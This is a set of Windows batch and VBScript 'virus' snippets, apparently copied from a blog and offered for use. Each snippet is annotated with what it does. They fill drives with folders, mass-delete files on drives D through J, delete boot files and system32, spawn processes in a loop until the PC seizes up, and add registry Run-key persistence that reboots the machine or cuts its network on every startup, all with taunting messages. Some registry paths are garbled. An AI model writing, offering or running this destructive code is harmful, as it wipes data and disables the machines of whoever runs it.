@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:                                                      --------------->loops from c to d to e to c
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in


-----------------------------------


@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q                                              --------------------->deletes all directories(Except C drive)
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


-----------------------------
(save as .VBS)

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)		             ---------------->kills the whole pc

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next

------------------------

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f			   --------------------->shutdowns the pc,on rebot displays the below mssg and shutdowns again
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You Are Nailed, Buy A New Computer This Is Piece Of Shit.
PAUSE

-----------------------

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini						                                             --------------------------->deletes C drive
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

------------------------------
shutdown -s -t 100 c “Installing Updates”

--------------------------------

del c:\WINDOWS\system32\*.*/q                                                ---------------->delets system 32

--------------------------------
echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f  			                    ----------->won't connect internet after this code
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo  Sorry baby! you lost your fucking internet
PAUSE
